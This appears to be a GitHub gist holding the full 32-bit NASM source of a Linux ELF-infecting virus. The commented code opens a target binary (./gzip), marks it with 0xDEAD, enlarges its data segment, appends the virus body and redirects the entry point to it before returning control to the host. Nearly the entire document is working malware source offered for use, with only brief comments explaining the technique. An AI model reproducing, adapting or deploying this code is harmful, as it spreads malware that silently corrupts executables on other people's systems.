Skip to content

Instantly share code, notes, and snippets.

@fakessh

fakessh/elf infect

Created September 13, 2012 00:58
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save fakessh/3711093 to your computer and use it in GitHub Desktop.
Save fakessh/3711093 to your computer and use it in GitHub Desktop.
Download ZIP
elf infect
Raw
elf infect
;****************************************************************************
; Linux ELF file infection
;****************************************************************************
; Compile with:
; nasm -f elf hole.asm -o hole.o
; gcc hole.o -o hole
section .text
global main
hoste:
ret
main:
pusha ; Beginning of the virus
; Push all the parameters
call getdelta
getdelta:
pop ebp
sub ebp,getdelta
mov eax,125 ; I modify the attributes with
lea ebx,[ebp+main] ; mprotect for write in protec-
; ted pages
and ebx,0xFFFFF000 ; Round up to pages
mov ecx,03000h ; r|w|x attributes
mov edx,07h ; We will only need this in
int 80h ; the 1st gen, because we'll
; copy us in the data section
mov ebx,01h
lea ecx,[ebp+texto]
mov edx,0Ch ; Show a Hello World with a
call sys_write ; write to stdout
mov eax,05
lea ebx,[ebp+archiv] ; open file to infect (./gzip)
mov ecx,02 ; read/write
int 80h
mov ebx,eax ; Handle in EBX
xor ecx,ecx
xor edx,edx ; Go to beginning of file
call sys_lseek
lea ecx,[ebp+Elf_header] ; Read the ELF header to our
mov edx,24h ; variable
call sys_read ;
cmp word [ebp+Elf_header+8],0xDEAD ; Check for previous infection
jne infect ;
jmp salir
infect:
mov word [ebp+Elf_header+8],0xDEAD
; The mark is on the 2 first
; fill bytes in the ident struc
mov ecx,[ebp+e_phoff] ; e_phoff is a ptr to the PH
add ecx,8*4*3 ; Obtain 3rd entry of data seg
push ecx
xor edx,edx
call sys_lseek ; Go to that position
lea ecx,[ebp+Program_header] ; Read the entry
mov edx,8*4
call sys_read
add dword [ebp+p_filez],0x2000 ; increase segment size in
add dword [ebp+p_memez],0x2000 ; memory and in the file
;
; The size to add must be superior to the size of the virus, because besides
; copy the virus, we have also to copy the section table, located before
; and it is not mapped into mem by default. It could be shifted (for avoid
; copying it) but for simplycity reasons i don't do that.
pop ecx
; data seg
xor edx,edx
call sys_lseek ; back to entry position
lea ecx,[ebp+Program_header]
mov edx,8*4
call sys_write ; Write entry to the file
xor ecx,ecx
mov edx,02h
call sys_lseek ; Go to file end
; EAX = File Size, that will be phisical offset of the virus
mov ecx,dword [ebp+oldentry]
mov dword [ebp+temp],ecx
mov ecx,dword [ebp+e_entry]
mov dword [ebp+oldentry],ecx
sub eax,dword [ebp+p_offset]
add dword [ebp+p_vaddr],eax
mov eax,dword [ebp+p_vaddr] ; EAX = New entrypoint
mov dword [ebp+e_entry],eax
; These are the calculations of the new entry address, that will point to the
; code of the virus. For calculate the virtual address of the virus in memory
; i move the pointer to the end of the file with lseek, so the EAX register
; will have the phisical size of the file (i.e. the physical position of the
; virus in the file).
; If to that position i substract the physical position of the beginning of
; the data segment, i will have the virus position relative to the beginning
; of the data segment, and if i add to it the virtual address of the segment
; i will obtain the virtual address of the virus in memory.
lea ecx,[ebp+main]
mov edx,virend-main
call sys_write ; Write the virus to the end
xor ecx,ecx
xor edx,edx
call sys_lseek ; Set pointer to beginning of
; the file
lea ecx,[ebp+Elf_header]
mov edx,24h
call sys_write ; Modify header with new EIP
mov ecx,dword [ebp+temp]
mov dword [ebp+oldentry],ecx
salir: mov eax,06 ; Close the file
int 80h
popa
db 068h ; Opcode of a PUSH
oldentry:
dd hoste ; back to infected program
ret
;
;
sys_read: ; EBX = Must be File Handle
mov eax,3
int 80h
ret
sys_write: ; EBX = Must be File Handle
mov eax,4
int 80h
ret
sys_lseek: ; EBX = Must be File Handle
mov eax,19
int 80h
ret
dir dd main
dw 010h
archiv db "./gzip",0 ; File to infect
datos db 00h
temp dd 00h ; Save oldentry temporally
;**************** Data Zone *************************************************
newentry dd 00h ; New virii EIP
newfentry dd 00h
myvaddr dd 00h
texto db 'HELLO WORLD',0h
Elf_header:
e_ident: db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
e_type: db 00h,00h
e_machine: db 00h,00h
e_version: db 00h,00h,00h,00h
e_entry: db 00h,00h,00h,00h
e_phoff: db 00h,00h,00h,00h
e_shoff: db 00h,00h,00h,00h
e_flags: db 00h,00h,00h,00h
e_ehsize: db 00h,00h
e_phentsize: db 00h,00h
e_phnum: db 00h,00h
e_shentsize: db 00h,00h
e_shnum: db 00h,00h
e_shstrndx: db 00h,00h
jur: db 00h,00h,00h,00h
Program_header:
p_type db 00h,00h,00h,00h
p_offset db 00h,00h,00h,00h
p_vaddr db 00h,00h,00h,00h
p_paddr db 00h,00h,00h,00h
p_filez db 00h,00h,00h,00h
p_memez db 00h,00h,00h,00h
p_flags db 00h,00h,00h,00h
p_align db 00h,00h,00h,00h
Section_entry:
sh_name db 00h,00h,00h,00h
sh_type db 01h,00h,00h,00h
sh_flags db 03h,00h,00h,00h ;alloc
sh_addr db 00h,00h,00h,00h
sh_offset db 00h,00h,00h,00h
sh_size dd (virend-main)*2
sh_link db 00h,00h,00h,00h
sh_info db 00h,00h,00h,00h
sh_addralign db 01h,00h,00h,00h
sh_entsize db 00h,00h,00h,00h
virend:
;****************************************************************************
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment